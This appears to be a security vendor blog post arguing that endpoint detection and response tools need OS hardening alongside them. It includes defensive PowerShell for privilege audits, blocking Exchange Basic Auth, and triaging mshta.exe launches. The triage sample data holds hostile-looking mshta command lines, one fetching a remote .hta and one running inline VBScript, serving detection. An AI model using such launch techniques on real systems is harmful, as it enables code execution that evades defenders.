EDR is not a silver bullet

Old tradition said that shooting a werewolf, vampire, or even just your average bad guy with a silver bullet was a surefire takedown: one hit, no more bad guy.

As cybersecurity professionals, we understand – just as people in the Old West knew – that there is no panacea, no silver bullet. Yet humans gravitate to simple solutions to complex challenges, and we are constantly (albeit subconsciously) searching for miracle technology.

Endpoint detection and response (EDR) tools have become a standard component of cybersecurity programs. They are the starting point for any IT security organization, and there is nothing wrong with that. In a recent Cymulate study of over 1 million tests performed by our customers in 2021, the most popular test vector was EDR.

Yet cybersecurity players should not assume that EDR is a silver bullet. The fact is that the effectiveness and protective power of EDR as a standalone solution has slowly waned over the decade since Gartner coined the term. Although it has become a mainstay of the security posture of enterprises and SMBs alike, attacks have exploded in frequency, severity and success. Today, EDR faces some of its greatest challenges, including threats that target EDR systems directly, such as the highly successful Grandoreiro banking Trojan.

Not a miracle solution… But still very relevant

While EDR shouldn’t be your only line of defense against advanced threats, it belongs in every defense package. It must be installed on all servers and endpoints in the organization, including those running Linux. Installation alone, however, is not enough: your organization remains at significant risk if the underlying operating system and the EDR are not both properly implemented and fine-tuned. Why? Based on the findings of the study mentioned above, here are three reasons why tuning both the EDR and the underlying operating system is crucial:

1. Vulnerabilities

A major challenge with EDR is that not everything related to security depends on the EDR. EDR is a vendor-delivered, third-party solution that sits on top of first-party security controls, such as the operating system’s own protections or cloud application controls. For that reason, there are things EDR solutions deliberately won’t do, lest they interfere with production assets. The consequence is that attackers frequently exploit weaknesses in those first-party controls to circumvent the EDR.

2. Excessive permissions

In many enterprises, operating system permissions still do not comply with the principle of least privilege. Field workers in commercial or other non-technical roles are often granted excessive permissions. When these trusted actors can do things like open PowerShell to manipulate the Control Panel, load and run arbitrary DLLs, and access directories well beyond the Windows directory, the organization ends up exposed. When excessive permissions allow DLL loading and injection, various JavaScript-based attacks, or wildcard certificates, all an EDR solution can do is play catch-up after the fact. The reason? EDR is built on an “assume breach” mentality, and post-execution remediation, by definition, is only relevant once the attack has already taken place.
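The first thing a practitioner would check on a fleet like the one described above is who actually holds local administrator rights and whether any application control is enforced for the script and DLL execution paths mentioned. The following PowerShell audit is an added example written for this article, not Cymulate’s own tooling or anything from the study; the approved-administrator list and the CONTOSO group names are placeholders you would replace with your own.

```powershell
# Added example (not from the article): least-privilege audit for a Windows endpoint.
# 1. Flags members of the local Administrators group that are not on an approved list.
# 2. Summarises AppLocker enforcement per rule collection (Exe, Dll, Script, Msi, Appx),
#    since "AuditOnly" or "NotConfigured" on Dll/Script means rundll32/PowerShell abuse
#    is logged at best, not blocked.
# Requires Windows PowerShell 5.1 or PowerShell 7 on Windows, the LocalAccounts module,
# and the AppLocker module (Windows 10/11 Enterprise or Windows Server).

# Placeholder approved list: only the LAPS-managed built-in account and two domain groups.
$approvedAdmins = @(
    "$env:COMPUTERNAME\Administrator",
    'CONTOSO\Domain Admins',          # assumed group names
    'CONTOSO\Workstation Admins'
)

function Get-UnapprovedLocalAdmin {
    param([string[]]$Approved = $approvedAdmins)
    # Get-LocalGroupMember returns Name as DOMAIN\account or COMPUTER\account,
    # plus ObjectClass (User/Group) and PrincipalSource (Local/ActiveDirectory/AzureAD).
    Get-LocalGroupMember -Group 'Administrators' |
        Where-Object { $Approved -notcontains $_.Name } |
        Select-Object Name, ObjectClass, PrincipalSource
}

function Get-AppLockerEnforcementSummary {
    # -Effective merges local and domain policy; -Xml returns it as an XML string.
    [xml]$policy = Get-AppLockerPolicy -Effective -Xml
    foreach ($collection in $policy.AppLockerPolicy.RuleCollection) {
        [pscustomobject]@{
            Collection      = $collection.Type             # Exe, Dll, Script, Msi, Appx
            EnforcementMode = $collection.EnforcementMode  # Enabled, AuditOnly, NotConfigured
            RuleCount       = @($collection.ChildNodes).Count
        }
    }
}

# Any row from the first call is a least-privilege finding; any Dll or Script
# collection not in "Enabled" mode is a gap the EDR will have to cover on its own.
Get-UnapprovedLocalAdmin        | Format-Table -AutoSize
Get-AppLockerEnforcementSummary | Format-Table -AutoSize
```

If the second table is empty, no AppLocker policy applies to the machine at all; on such hosts a user who can open PowerShell can also load DLLs via rundll32 and run scripts from any directory, which is exactly the post-execution position the paragraph above describes.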

3. Legacy protocols

Every enterprise environment has legacy resources. Legacy applications, TCP/IP protocols, operating systems: all of them carry legacy features that often remain enabled by default. Sometimes that is out of necessity, but often those back doors are left open simply because no one thought to close them.

For example, in a recent update Microsoft asked Exchange administrators to disable Basic Authentication, which had always been on by default. Basic Authentication sends the username and password, merely Base64-encoded, with every request, so any man-in-the-middle position on the connection yields a reusable password, and multi-factor authentication cannot be enforced on it. Moving to Modern Authentication (OAuth 2.0 tokens) is therefore necessary. This is a legacy protocol that remained exposed…until someone closed the door.
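Closing that particular door in Exchange Online is done with an authentication policy. The script below is an added example for this article, not Microsoft’s or Cymulate’s code; it assumes the ExchangeOnlineManagement module, an account with Exchange administrator rights, and uses a placeholder policy name and user address.

```powershell
# Added example (not from the article): block Basic Authentication tenant-wide in
# Exchange Online, then list users whose per-user policy could still override it.
# Assumptions: ExchangeOnlineManagement module installed; caller is an Exchange admin;
# 'Block Basic Auth' and user@contoso.example are placeholders.

Import-Module ExchangeOnlineManagement
Connect-ExchangeOnline -ShowBanner:$false

$policyName = 'Block Basic Auth'

# A freshly created authentication policy blocks Basic Auth for every protocol:
# all AllowBasicAuth* switches (Imap, Pop, Smtp, ActiveSync, OutlookService,
# PowerShell, WebServices, Rpc, ...) default to $false.
if (-not (Get-AuthenticationPolicy -Identity $policyName -ErrorAction SilentlyContinue)) {
    New-AuthenticationPolicy -Name $policyName | Out-Null
}

# Make it the tenant default; every user without an explicit policy inherits it.
Set-OrganizationConfig -DefaultAuthenticationPolicy $policyName

# Review every policy in the tenant: any AllowBasicAuth* value of True is remaining exposure.
Get-AuthenticationPolicy | Format-List Name, AllowBasicAuth*

# Per-user policies override the organization default, so list the users who have one.
# Anyone here assigned a policy other than $policyName needs a second look.
Get-User -ResultSize Unlimited |
    Where-Object { $_.AuthenticationPolicy } |
    Select-Object Name, UserPrincipalName, AuthenticationPolicy

# Policy changes can take up to 24 hours to propagate. To force the blocking policy
# onto one user immediately, assign it and reset the token validity timestamp:
# Set-User -Identity 'user@contoso.example' -AuthenticationPolicy $policyName
# Set-User -Identity 'user@contoso.example' -STSRefreshTokensValidFrom (Get-Date)
```

Before applying the policy, check the sign-in logs for clients that still authenticate with Basic Auth (old IMAP/POP clients, scanners that send mail over SMTP AUTH); those are the “necessity” cases the paragraph above mentions, and they need a modern-auth capable replacement rather than a permanent exception.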

Another example is the old Microsoft HTA (HTML Application) format. HTA files are executed by mshta.exe, a native, Microsoft-signed Windows binary that lives in the Windows System32 folder. One click on a malicious .hta file and its embedded script runs with the full privileges of the user through that trusted system binary, so to an EDR the activity can look like nothing more than a legitimate Windows component doing its job.
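Because mshta.exe itself is legitimate, the useful signal is in how it was launched: by what parent, with what argument, from where. The triage function below is an added example written for this article, not part of the original text or any vendor product. The four event records are constructed stand-ins for Sysmon Event ID 1 fields (ParentImage, Image, CommandLine), and every path, hostname and user name in them is a placeholder.

```powershell
# Added example (not from the article): triage mshta.exe process-creation events.
# Input: objects with ParentImage, Image and CommandLine (the Sysmon Event ID 1 shape).
# The records below are constructed samples, not real telemetry.

$sampleEvents = @(
    [pscustomobject]@{ ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
                       Image       = 'C:\Windows\System32\mshta.exe'
                       CommandLine = 'mshta.exe https://cdn.example.invalid/update.hta' },
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\mshta.exe'
                       CommandLine = '"C:\Windows\System32\mshta.exe" "C:\Users\jdoe\Downloads\invoice.hta"' },
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\cmd.exe'
                       Image       = 'C:\Windows\System32\mshta.exe'
                       CommandLine = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""calc.exe"",0:close")' },
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\mshta.exe'
                       CommandLine = 'mshta.exe "C:\Program Files\Contoso\HelpDesk\console.hta"' }  # assumed internal tool
)

function Test-SuspiciousMshta {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)] [pscustomobject]$Event)
    process {
        if ($Event.Image -notmatch '\\mshta\.exe$') { return }
        $reasons = [System.Collections.Generic.List[string]]::new()

        # 1. Spawned by a document handler, mail client or browser: the classic phishing chain.
        if ($Event.ParentImage -match '\\(WINWORD|EXCEL|POWERPNT|OUTLOOK|msedge|chrome|firefox)\.exe$') {
            $reasons.Add("parent is $([IO.Path]::GetFileName($Event.ParentImage))")
        }
        # 2. Payload fetched over the network instead of a local file.
        if ($Event.CommandLine -match 'https?://') { $reasons.Add('remote URL') }
        # 3. Inline script protocol handler: no .hta file ever touches disk.
        if ($Event.CommandLine -match '(vbscript|javascript):') { $reasons.Add('inline script protocol') }
        # 4. An .hta launched from a user-writable location.
        if ($Event.CommandLine -match '\.hta\b' -and
            $Event.CommandLine -match '\\(Users|Temp|AppData|Downloads|ProgramData)\\') {
            $reasons.Add('.hta in user-writable path')
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Verdict     = 'SUSPICIOUS'
                Reasons     = $reasons -join '; '
                CommandLine = $Event.CommandLine
            }
        }
    }
}

# For live data, read Sysmon with
#   Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
# and map its event-data fields onto the three properties above (mapping omitted here).
$sampleEvents | Test-SuspiciousMshta | Format-Table -AutoSize -Wrap
```

The first three samples are flagged (Office parent plus remote URL, .hta in a Downloads folder, inline VBScript); the fourth, an assumed internal help-desk console under Program Files, is not. That last case is the reason a blanket “alert on mshta.exe” rule is noisy, and it also shows the cleaner fix: where no business application needs HTAs, block mshta.exe outright with AppLocker or WDAC and let the EDR handle only the exceptions.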

The bottom line

Although they remain the cornerstone of most cybersecurity defenses, EDR systems are clearly not a silver bullet. On their own, they are not enough to protect the organization as its first line of defense against breaches. That said, EDR – if implemented optimally, with OS testing and tuning – has an important role to play. To maximize the security ROI of an EDR solution, organizations must ensure that it is not undermined by first-party vulnerabilities, excessive permissions, or legacy protocols.

Kimberly B. Nguyen